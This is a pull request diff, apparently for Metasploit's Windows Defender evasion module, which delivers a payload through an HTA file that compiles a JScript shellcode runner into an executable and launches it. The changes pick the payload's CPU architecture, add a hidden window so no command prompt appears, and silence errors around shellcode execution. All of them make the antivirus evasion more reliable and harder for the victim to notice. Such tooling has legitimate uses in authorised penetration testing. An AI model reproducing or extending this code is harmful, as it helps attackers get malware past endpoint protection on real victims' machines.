### PR TITLE
improve windows_defender_js_hta

### DIFF
--- a/data/exploits/evasion_shellcode.js
+++ b/data/exploits/evasion_shellcode.js
@@ -72,5 +72,6 @@ function ShellCodeExec()
   WaitForSingleObject(hThread, 0xFFFFFFFF);
 
 }
-
+try{
 ShellCodeExec();
+}catch(e){}

--- a/data/exploits/hta_evasion.hta
+++ b/data/exploits/hta_evasion.hta
@@ -141,8 +141,9 @@
     var objShell = new ActiveXObject("WScript.shell");
     var js_f = path + "\\\\<%= fname %>.js";
     var ex = path + "\\\\<%= fname %>.exe";
+    var platform = "/platform:<%= arch %>";
 
-    objShell.run(comPath + " /out:" + ex + " " + js_f);
+    objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
     while(!fso.FileExists(ex)) { }
     
     objShell.run(ex, 0);

--- a/modules/evasion/windows/windows_defender_js_hta.rb
+++ b/modules/evasion/windows/windows_defender_js_hta.rb
@@ -47,11 +47,11 @@ class MetasploitModule < Msf::Evasion
     jsnet_encoded = Rex::Text.encode_base64(js_file)
     # This is used in the ERB template
     fname = Rex::Text.rand_text_alpha(6)
+    arch = ["x86", "x64"].include?(payload.arch.first) ? payload.arch.first : "anycpu"
     hta_path = File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta')
     hta = File.read(hta_path)
     fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exists?(hta_path)
     hta_file = ERB.new(hta).result(binding())
-
     file_create(hta_file)
   end
 end


### PR DESCRIPTION
-add payload arch detection for jsc compiler (otherwise x86 payload won't work on x64 target)
-prevent cmd prompt when launching jsc

